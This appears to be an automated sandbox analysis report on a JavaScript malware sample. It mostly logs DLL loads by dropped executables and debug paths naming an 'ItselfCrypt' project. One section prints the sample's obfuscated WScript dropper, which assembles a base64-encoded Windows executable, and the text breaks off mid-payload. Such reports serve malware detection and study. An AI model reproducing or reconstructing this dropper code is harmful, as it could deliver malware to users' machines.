              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: cc.jsStatic file information: File size 1729444 > 1048576
              Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe, 00000018.00000002.2501892107.00000000028FF000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000002.00000002.2148006746.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003327000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.2255004351.0000000003329000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AF6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000011.00000002.2421295277.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002819000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028B3000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002817000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002866000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.0000000002946000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2501892107.00000000028FD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000011.00000002.2421295277.0000000002AAF000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);ZrshnIkzr = '' XLSJBrjTTVfbj = 60;var umxzSxEEWdqHpaqxQRJlALrQLUdXtWpCGtfawWlRXmBhbCMRsWDEWpjivhoxThKzonAw = 'uQBtgsONJJoIIMeXTlgRJxeOinxqbBsoCPWcUJXebWYltfoHCngDGjnxlmLsuYlIRzGtpBCKNCpnYsVCzqnnVoiTcZrixfjDkQUtYuRAlWqEtzZtRJsEkxmcRmRQKUMhTmCHXbd';EZmCzyeaczyQomfS = 2;var nescldAqRJIlGwRVqfoeyvmdmMoRLDXvnTPdfyraZvkqptTgicaJyAUrrOqZpjeOlNxnhnqrnNFCLwottIiidOwmyXmQISlqQVEcvfyumiWkvSguawfgAwlXQKoJBZjU = 'bOlpsLxNJnwurMrgqrqLmFpUkgMlrotNzBJhgrCOyRWMAqfETHTKjXhWYQEMzMWVuiuqCKzzobNVidUtAHRjViecUmIPmqPmvBSRwpBJITVHJMovwKLrunzLESWQBkMyLbZgLDxKGIbBNWSHyMTbeYrICGNdTlHX';ZrshnIkzr = ZrshnIkzr + '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